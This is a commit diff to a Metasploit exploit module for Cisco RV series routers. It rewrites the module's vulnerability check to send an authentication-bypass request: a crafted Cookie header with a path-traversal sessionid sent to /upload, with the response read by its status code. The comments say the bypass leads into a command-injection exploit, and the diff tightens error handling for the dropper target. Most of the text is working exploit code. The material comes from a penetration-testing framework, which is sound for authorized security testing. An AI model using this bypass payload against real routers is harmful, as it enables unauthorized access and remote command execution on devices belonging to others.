Rewrote check method to only abuse authentication bypass. Added additional status checks.
This commit is contained in:
parent
036ed7f467
commit
79b1801a4f
|
@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
# sessionid utilized later needs to be set to length
|
||||
# of 16 or exploit will fail. Tested with lengths
|
||||
# 14-17
|
||||
def generate_session_id
|
||||
return Rex::Text.rand_text_alphanumeric(16)
|
||||
end
|
||||
|
||||
def check
|
||||
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
|
||||
# Test to see if router is responding and possibly vulnerable
|
||||
res = send_exploit('id')
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/upload',
|
||||
'headers' => {
|
||||
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
|
||||
}
|
||||
}, 10)
|
||||
|
||||
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
|
||||
|
||||
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
|
||||
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
|
||||
|
||||
# Vulnerable versions will respond with 301 Moved Permanently in body of response
|
||||
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
|
||||
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
|
||||
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
|
||||
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
|
||||
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
|
||||
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
|
||||
if res.nil?
|
||||
return CheckCode::Unknown('The device did not respond to request packet.')
|
||||
elsif !res.nil? && res.code == 405
|
||||
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
|
||||
elsif res.code == 403
|
||||
return CheckCode::Safe('The device is not vulnerable to exploitation.')
|
||||
else # Catch-all
|
||||
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
|
||||
end
|
||||
|
||||
CheckCode::Safe('The target did not respond with an expected payload.')
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts = {})
|
||||
|
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if target['Type'] == :linux_dropper
|
||||
fail_with(Failure::Unreachable, 'The target did not respond') unless res
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||
begin
|
||||
body_json = res.get_json_document
|
||||
|
|
Loading…
Reference in New Issue